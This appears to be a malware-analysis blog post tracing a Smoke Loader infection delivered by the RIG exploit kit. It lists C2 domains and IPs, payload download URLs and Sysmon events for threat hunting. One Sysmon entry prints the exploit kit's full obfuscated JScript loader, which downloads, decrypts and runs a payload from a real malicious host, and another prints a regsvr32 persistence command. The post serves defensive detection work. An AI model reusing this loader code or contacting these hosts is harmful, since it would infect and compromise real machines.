Three days of a Smoke Loader infection and follow-up malware

Smoke Loader is a malicious bot application that can be used to load other malware. Smoke Loader has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. – https://attack.mitre.org/software/S0226/

I have added a zipped pcap file for your analysis. The password for the zipped pcap is infected all lowercase.

PCAP file of the infection traffic:
2019-11-24-SmokeLoader-pcap.zip

[ASSOCIATED DOMAINS – DAY 1]
94.130.90.228 – atztds45.club GET /dj398ghw874rhq2yrd – REDIRECT TO RIG EK
62.109.9.21 – GET /?MjA1MTEw&BUxq&oPMRaGO=filly – RIG EK
192.64.119.112 – blogserv27.com POST /blogpics17/ – SMOKE LOADER C2
198.54.117.216 – www.blogserv27.com GET /blogpics17/?from=@ – SMOKE LOADER C2
5.101.181.110 – blogserv279.club POST /blogpics17/ – SMOKE LOADER C2
192.64.119.111 – kxserv250.club POST /blogpics17/ – SMOKE LOADER C2
198.54.117.212 – www.kxserv250.club POST /blogpics17/ – SMOKE LOADER C2
185.222.202.235 – dsmail94x.xyz POST /blogpics17/ – SMOKE LOADER C2

[ASSOCIATED DOMAINS – DAY 2]
192.64.119.112 – blogserv27.com POST /blogpics17/ – SMOKE LOADER C2
198.54.117.215 – www.blogserv27.com GET /blogpics17/?from=@ – SMOKE LOADER C2
185.205.210.118 – pstarserver17km.xyz GET /socks111atx.exe – SMOKE LOADER UPDATE
185.205.210.118 – pstarserver17km.xyz GET /pred777amx.exe – PREDATOR THE THIEF PAYLOAD
67.43.224.142 – POST /api/check.get – PREDATOR THE THIEF C2
67.43.224.142 – POST /api/gate.get?p1= – PREDATOR THE THIEF C2
192.236.161.230 – cs-server1.biz GET /forums/gate.php – UNKNOWN C2

nadvexmail19mn.xyz – UNRESOLVED DNS QUERY

[UNUSUAL USER-AGENT]
GET /forums/gate.php HTTP/1.1
User-Agent: zAL4AbYO/3JKdXwe+CYUn1adJINsbgLas1XvzK57KxbdcGj7sjtUcih3VeEpnSc1QYQeav0+xo3UWd+f3x9tMZQU4l0P9vLpa/jPBGOQzFtyTPHJc7iXX6ikMkaJzpFU
Host: cs-server1.biz

[ASSOCIATED DOMAINS – DAY 3]
192.236.161.230 – cs-server1.biz GET /forums/gate.php – UNKNOWN C2
192.64.119.112 – blogserv27.com POST /blogpics17/ – SMOKE LOADER C2
198.54.117.210 – www.blogserv27.com GET /blogpics17/?from=@ – SMOKE LOADER C2
5.101.181.110 – blogserv279.club POST /blogpics17/ – SMOKE LOADER C2
185.205.210.118 – pstarserver17km.xyz GET /socks111atx.exe – SMOKE LOADER UPDATE
185.205.210.118 – pstarserver17km.xyz GET /sky/new/dos777.exe – SUSPECTED MADUSAHTTP PAYLOAD
131.188.40.189 – GET /tor/status-vote/current/consensus – TOR TRAFFIC
195.22.26.248 – csseverapi.biz POST /admin/users/login/api/api.jsp – MEDUSAHTTP C2
192.236.161.230 – greenboolinfo.comPOST /admin/users/login/api/api.jsp – MEDUSAHTTP C2
192.236.161.230 – cs-server1.biz GET /forums/gate.php – UNKNOWN C2

moolficapi.world – UNRESOLVED DNS QUERY

ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

[SYSMON EVENT 1 – RIG EK EXPLOITING IEXPLORER CALLING FOR PAYLOAD]
Image C:\Windows\System32\cmd.exe
CommandLine CMd.exe /q /c cd /d “%%tmp%%” && echo function Q(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%%g[“length”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “,u=function(x){return E[“split”](“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this[“”+”WScr”+”ipt”]]:0;U=U[1],L=U[u(14)],v=u(9),m=U[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00”)+027);s[“writetext”](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Q(d.responseText,g(n))};>n.t && stArT wsCripT //B //E:JScript n.t “L1ZytEdfgdg” “http://62.109.9.21/?MTAyNTAw&kBJ&WrDD=disagree&zQQpAn=abettor&JYSMM=difference&KLZKCcS=irreverent&cNgONR=abettor&DTWveM=neighboring&JwXZjNOB=filly&rzSyavrX=community&ffd3dfdfs=xHbQMrnYbRfFFYTfKPLEUKNEMUbWA0GKwYaZhanVF5axFDDGpbv1FxvspVqdCFuEmvtvdLQHIwqh1ULASww0mY&t4gdfdff4=dcUFxGpKH4ikiDmhGd1Z-H_BKIZgNF-JXDQbYy0VryybgXJc0lwR7T4WhQmO0tW10W5A0Um6jLFKj58EYwV0QC&RlPMr=dinamic&GIyFYp=border&qMP=professional&OdPXa=callous&uwVuNTk2MTMx” “ยค”
CurrentDirectory C:\Users\Robert\Desktop\
User Robert-PC\Robert
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine “C:\Program Files\Internet Explorer\iexplore.exe” SCODEF:2108 CREDAT:144385 /prefetch:2

[Original Payload]
Image C:\Users\Robert\AppData\Local\Temp\rad27EA4.tmp.exe
CommandLine rad27EA4.tmp.exe
CurrentDirectory C:\Users\Robert\AppData\Local\Temp\
Hashes MD5=67E99ABB3FF2880CDA897899D426F7D1,SHA256=CB9B359B8791692FDCAE0FD36ECE6D4484BE1B39EC75C1D49EA7BE1816576A36
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\System32\cmd.exe” /c rad27EA4.tmp.exe

[Sysmon Event 2 – Process Hollowing of Explorer.exe]
Image C:\Windows\Explorer.EXE
TargetFilename C:\Users\Robert\AppData\Roaming\wbttadv
CreationUtcTime 2019-03-02 01:30:12.015
PreviousCreationUtcTime 2019-11-22 00:40:32.967

[Sysmon Event 3 – Explorer.exe communicating with Smoke Loader C2]
Image C:\Windows\explorer.exe
SourceIp 192.168.137.237
DestinationIp 198.54.117.216
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 3 – Explorer.exe communicating with Smoke Loader C2]
Image C:\Windows\explorer.exe
SourceIp 192.168.137.237
DestinationIp 5.101.181.110
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 1 – Smoke Loader Task Schedule persistence]
Image C:\Windows\System32\regsvr32.exe
CommandLine C:\Windows\system32\regsvr32.EXE /s /n /u /i:”C:\Users\Robert\AppData\Roaming\tuvragt” scrobj
CurrentDirectory C:\Windows\system32\
Hashes MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B
ParentImage C:\Windows\System32\taskeng.exe
ParentCommandLine taskeng.exe {0D882FD4-FA3D-418B-BAC2-54AAA48594D7}

[Sysmon Event 3 – TeamViewer communicating with Smoke Loader C2]
Image C:\Users\Robert\AppData\Local\Temp\7869.tmp\TeamViewer.exe
Protocol tcp
DestinationIp 5.101.181.110
DestinationHostname scd103df0.fastvps-server.com
DestinationPort 80
DestinationPortName http


Shown above: TeamViewer was also found to be installed and was observed communicating with the Smoke Loader C2.

 


Shown above: Some of the network traffic observed in the initial infection